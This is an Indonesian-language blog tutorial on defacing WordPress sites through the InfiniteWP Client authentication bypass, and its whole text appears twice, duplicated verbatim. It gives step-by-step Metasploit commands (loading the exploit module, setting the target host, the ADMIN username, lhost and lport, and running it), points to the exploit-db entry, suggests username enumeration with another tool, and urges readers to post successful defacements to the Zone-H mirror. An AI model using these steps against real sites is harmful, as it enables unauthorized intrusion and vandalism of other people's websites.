Tutorial Deface 2021 WordPress Plugin InfiniteWP - Client Authentication Bypass
Assalamualaikum Sob 🥰
Balik lagi bersama gw, Om Crusher 😋 akwowkwosk
Ehh ini bahas Authentication Bypass
Apa sih Authentication itu ?
Otentikasi adalah proses apa pun yang digunakan sistem memverifikasi identitas Pengguna yang ingin mengaksesnya. Otentikasi aplikasi web dapat diimplementasikan menggunakan Kredensial, yang masing-masing terdiri dari ID Pengguna dan Kata Sandi.
Source : search engine
Itu kalo Autentikasi Berarti kebalikannya bang.
Di lewati gitu autentikasinya
Hehe lanjut deh, ni gw ngisi blog malem bgt.
Jam 2 an, tgl 8 Mei 2020 pas Romadhon.
Okedeh next !
#############
Google Dork : N/ A
Tested : Laptop gw Sendiri :v
Exploit : www.exploit-db.com/exploits/48047
#############
Panggil exploitnya gan
msf5>use exploit/unix/webapp/wp_infinitewp_auth_bypass
Ohh iyee, itu gw pake Parrot 4.8 Stable
Barangkali ada yang pake os" lumayan lama, ato metasnya blom di update, kemunhkinan gaada exploitnya.
Kalo mau add, comot diatas tuh.
msf5>options
Buat melihat bbrapa opsi yg ready :v
>set RHOST http://fvcking.onion
>set username ADMIN
Khusus Username, kalian bisa enumerate pake Tools wphunter, cari aja di blog ini, Ada kok 😁
Sekalian keliling" hehe.
buka lagi terminal ketik
$ifconfig
Liat gambar bener" nah itu kita set ke lhost
>set lhost 192.168.1.1
>set lport (saran jangan 4444)
Udah yeee kan ? Tinggal exploit
msf5>exploit
Semoga dapet session nya wkwk,
Jan lupa, kalo dapet Mirror Zh > OK ! Biar ganteng 🤣🤣🤣
Dah segini aja, semoga bermanfaat
Wassalamualaikum.
~ Facebook : https://facebook.com/crusher.gov
Balik lagi bersama gw, Om Crusher 😋 akwowkwosk
Ehh ini bahas Authentication Bypass
Apa sih Authentication itu ?
Otentikasi adalah proses apa pun yang digunakan sistem memverifikasi identitas Pengguna yang ingin mengaksesnya. Otentikasi aplikasi web dapat diimplementasikan menggunakan Kredensial, yang masing-masing terdiri dari ID Pengguna dan Kata Sandi.
Source : search engine
Itu kalo Autentikasi Berarti kebalikannya bang.
Di lewati gitu autentikasinya
Hehe lanjut deh, ni gw ngisi blog malem bgt.
Jam 2 an, tgl 8 Mei 2020 pas Romadhon.
Okedeh next !
#############
Google Dork : N/ A
Tested : Laptop gw Sendiri :v
Exploit : www.exploit-db.com/exploits/48047
#############
Panggil exploitnya gan
msf5>use exploit/unix/webapp/wp_infinitewp_auth_bypass
Ohh iyee, itu gw pake Parrot 4.8 Stable
Barangkali ada yang pake os" lumayan lama, ato metasnya blom di update, kemunhkinan gaada exploitnya.
Kalo mau add, comot diatas tuh.
msf5>options
Buat melihat bbrapa opsi yg ready :v
>set RHOST http://fvcking.onion
>set username ADMIN
Khusus Username, kalian bisa enumerate pake Tools wphunter, cari aja di blog ini, Ada kok 😁
Sekalian keliling" hehe.
buka lagi terminal ketik
$ifconfig
Liat gambar bener" nah itu kita set ke lhost
>set lhost 192.168.1.1
>set lport (saran jangan 4444)
Udah yeee kan ? Tinggal exploit
msf5>exploit
Semoga dapet session nya wkwk,
Jan lupa, kalo dapet Mirror Zh > OK ! Biar ganteng 🤣🤣🤣
Dah segini aja, semoga bermanfaat
Wassalamualaikum.
~ Facebook : https://facebook.com/crusher.gov
